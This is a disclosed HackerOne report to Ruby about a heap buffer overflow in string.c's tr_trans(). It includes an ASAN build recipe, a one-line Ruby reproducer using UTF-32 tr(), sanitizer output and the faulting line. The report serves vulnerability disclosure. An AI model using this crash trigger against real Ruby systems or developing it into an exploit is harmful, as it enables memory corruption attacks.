Heap corruption in string.c tr_trans() due to undersized buffer

Disclosed: 2016-06-21 00:57:04 By guido To ruby
Unknown
Vulnerability Details
(originally send by e-mail on 6 Jun 2016) Configure with ASAN AddressSanitizer: ``` mkdir install; CFLAGS="-fsanitize=address" ./configure --disable-install-doc --disable-install-rdoc --disable-install-capi -prefix=`realpath ./install` && make -j4 && make install ``` Then execute: ``` $ ./ruby -e '"a".encode("utf-32").tr("b".encode("utf-32"), "c".encode("utf-32"))' ================================================================= ==17122==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000014a98 at pc 0x7ff04065cf01 bp 0x7ffdfe7629b0 sp 0x7ffdfe7629a8 WRITE of size 4 at 0x602000014a98 thread T0 ... ... ``` The actual corruption occurs here: ```c 6196 TERM_FILL(t, rb_enc_mbminlen(enc)); ``` Guido
Actions
View on HackerOne
Report Stats
  • Report ID: 144485
  • State: Closed
  • Substate: informative
  • Upvotes: 2
Share this report